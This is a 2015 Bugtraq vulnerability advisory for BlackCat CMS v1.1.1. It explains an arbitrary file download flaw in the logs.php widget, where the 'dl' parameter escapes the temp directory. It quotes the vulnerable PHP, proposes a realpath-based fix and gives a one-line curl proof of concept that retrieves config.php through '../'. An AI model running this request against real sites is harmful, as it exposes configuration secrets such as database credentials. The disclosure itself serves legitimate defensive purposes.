Message-Id: <201506161207.t5GC71es028386@sf01web2.securityfocus.com>
Date: Tue, 16 Jun 2015 12:07:01 GMT
From: d4rkr0id@...il.com
To: bugtraq@...urityfocus.com
Subject: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability

# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability 
# Date: 2015/06/16
# Vendor Homepage: http://blackcat-cms.org/
# Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip
# Version: v1.1.1
# Tested on: CentOS 6.5, PHP 5.4.41
# Category: webapps

* Description

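File: /modules/blackcat/widgets/logs.php

The download branch of this widget builds a path from CAT_PATH.'/temp/' plus the `dl` GET parameter, packs whatever file that path resolves to into a .zip and streams the archive to the client. The only check visible before packing is file_exists(); nothing confirms that the resolved path is still under the temp directory, so, as the PoC below shows, a `../` in `dl` reaches files outside it (here config.php). The archive is written next to the source file and the excerpt shows no cleanup, so unexpected .zip files beside sensitive files are worth checking for on affected installs. A fix would canonicalise the path (e.g. realpath()) and require it to start with the temp directory, or accept only a bare file name, before creating the archive.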

 72 // download
 73 if(CAT_Helper_Validate::sanitizeGet('dl'))
 74 {
 75     $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl'));  <-- 'dl' is user-controlled and never checked to stay inside /temp/
 76     if(file_exists($file))
 77     {
 78         $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');
 79         $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))
 80             ->create(array($file));
 81         if(!$zip->errorCode() == 0)
 82         {
 83             echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")
 84                 . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );
 85         }
 86         else
 87         {
 88             $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';
 89             header("Pragma: public"); // required
 90             header("Expires: 0");
 91             header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
 92             header("Cache-Control: private",false); // required for certain browsers
 93             header("Content-Type: application/zip");
 94             header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
 95             header("Content-Transfer-Encoding: binary");
 96             header("Content-Length: ".filesize($filename));
 97             readfile("$filename");
 98             exit;
 99         }
100     }


POC:
curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip - 
